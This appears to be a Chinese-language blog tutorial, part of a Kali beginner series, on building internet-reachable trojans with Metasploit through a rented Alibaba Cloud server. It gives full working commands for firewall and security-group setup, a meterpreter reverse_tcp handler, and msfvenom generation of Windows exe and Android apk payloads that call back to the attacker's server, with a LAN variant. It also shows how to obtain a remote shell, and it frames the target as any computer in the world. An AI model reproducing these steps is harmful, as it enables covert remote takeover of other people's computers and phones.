kali新手入門教學(5)--利用雲服務器實現外網木馬

昨天剛買了個一年的阿里雲服務器,因爲ngrok提供的內網穿透服務不太穩定,比較慢,想自己搞點事情。
首先使用的工具還是我們偉大的metasploit-framework,然後網上關於這個的教學都一般侷限於局域網,確實局域網比較方便配置,而且實現也比較簡單,因爲設計到外網,只要在使用前確保你的目標靶機和你的主機可以互相ping通,就ok了。
好了首先把這次需要使用的幾個工具先列一下。
metasploit-framework,用來生成木馬並且獲得shell,kali自帶.服務器需要安裝
nmap掃描,kali自帶
sftp kali自帶
ssh kali自帶

1.配置防火牆

首先先去配置一下我們的服務器,由於我使用的是阿里雲服務器,配置界面我就只提供阿里雲的,其他服務器道理類似。
首先是阿里雲自帶的安全組,這個是比防火牆更可怕的東西,(怪不得阿里雲安全。。),我曾經嘗試過使用ufw disable的命令直接關閉防火牆,結果沒用,重啓也沒用
在這裏插入圖片描述就是不允許你添加防火牆策略,好吧那隻能手動修改。
進入阿里雲的網絡與安全,並且創建安全組,我的配置是這樣的,大概可以這樣配置,
在這裏插入圖片描述只需要修改入網規則,出網是默認無限制,然後我的msfconsole監聽的端口就是我設置的9999端口,大家可以先記住。

2.下載木馬神器

修改完服務器的安全組策略後就可以先遠程控制服務器下載我們需要的軟件了也就是我們的木馬神器。
在kali終端輸入
ssh [email protected]
然後輸入你的密碼,成功了就可以看到剛纔類似的界面了。
【備註:(10.10.10.10)對應的是服務器的外網ip地址,一定要區分好外網和內網的ip地址,在本次教程中我們幾乎不用關注內網ip地址,所使用的都是外網ip地址,說直白了,就是其他人可以訪問的你的地址…】
下載木馬神器有兩種方法,
(1)apt-get install metasploit-framework
(2)curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

chmod 755 msfinstall

./msfinstall
這兩種方法都可以,第一個稍微方便一點,然後安裝完以後輸入msfconsole能進入以下界面就說明你成功了
在這裏插入圖片描述界面酷酷的,好看.

3.生成木馬

這裏我們用win10作爲測試,同樣也可以入侵安卓手機。
現在這個環境裏的win10就相當於世界上任意一臺聯網的電腦,(點到爲止,你懂的),然後執行以下命令
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 9999
show options
在這裏插入圖片描述執行完命令一定要查看一下是否配置成功,lport對應的就是剛纔安全組允許的端口地址,(tcp),然後對應的監聽地址是0.0.0.0 ,這個真的是0.0.0.0,不要改(這個我也是看有些大佬講的,可以用,具體原因我也不太清楚。。),payload根據你要選擇的系統決定,這裏是windows,
配置成功後就可以exploit

4.確認是否開放了當前9999端口

由於我測試的時候出了很多問題,所以不放心就另外測試了一下,在使用的時候最好也這樣有利於及時debug
這裏就可以用到nmap掃描神器
在kali主機上執行
nmap -sS -A 10.10.10.10 -p 9999
10.10.10.10就是你的外網ip,然後指定端口爲9999
如果可以看到一下界面說明已經開始了監聽,(如果你沒有啓動msfconsole並且exploit是探測不到的,正常情況下9999端口沒有使用是探測不到的,一定要exploit再開啓探測)

在這裏插入圖片描述可以看到上面有個9999,tcp
(下面那段奇怪的是msf的原因)在這裏插入圖片描述同時你的msf也有反應,會顯示有session,這說明你的監聽正常可以去生成木馬了

(5)生成木馬

在打開一個終端,連入服務器,(一定要在服務器裏生成木馬在傳下來,不然可能因爲版本的原因導致無法拿到shell)
之前我想偷懶,準備在本機直接生成木馬,只不過是ip和端口換了一下,但聽有大佬說可能會反彈不到shell所以只好辛苦點去服務器上生成。

以下代碼在服務器上生成
win10
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=9999 -f exe -o /root/test.exe
安卓
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=9999 R > /root/apk.apk

在這裏插入圖片描述生成好了ls一下可以查看生成的木馬,記着修改 ip和port.

(6)從服務器獲得木馬

生成好木馬記住木馬位置,然後退出服務器,回到kali
執行以下命令進入sftp(這個更好用一些,推薦使用)
sftp [email protected]
然後輸入密碼,如果可以看到
sftp>說明成功了
pwd
確認當前路徑,默認root
ls
查看當前目錄下文件
然後
get test.exe
默認保存路徑爲本地的用戶,由於我是root就在root目錄下
當然他也會告訴你保存路徑
在這裏插入圖片描述然後取出木馬,放置到目標靶機上
由於我們這裏的木馬不能免殺,所以需要關閉我們的win10的防火牆,(怎麼免殺後面會講),然後點一下我們的木馬,沒有反應,但是可以看到已經拿到了shell
在這裏插入圖片描述
在這裏插入圖片描述可以看到返回了一個meterpreter,然後輸入shell就可以進入目標電腦的cmd

ok大功告成,恭喜你可以爲任何一臺電腦安裝木馬了
再多提一下,內網木馬就是再生成木馬的時候和set lhost的時候換成自己主機的內網ip,比如說我的就是192,168,1.128
然後使用前先用靶機ping一下自己的主機,
cmd輸入ping 192.168.1.128然後有回覆說明可以使用內網木馬,然後這個時候可以先生成木馬
win10
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.128 LPORT=9999 -f exe -o /root/test.exe
安卓
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.128 LPORT=9999 R > /root/apk.apk
msfconsole
進入msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.128
set lport 9999
show option
exploit
坐等上鉤

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章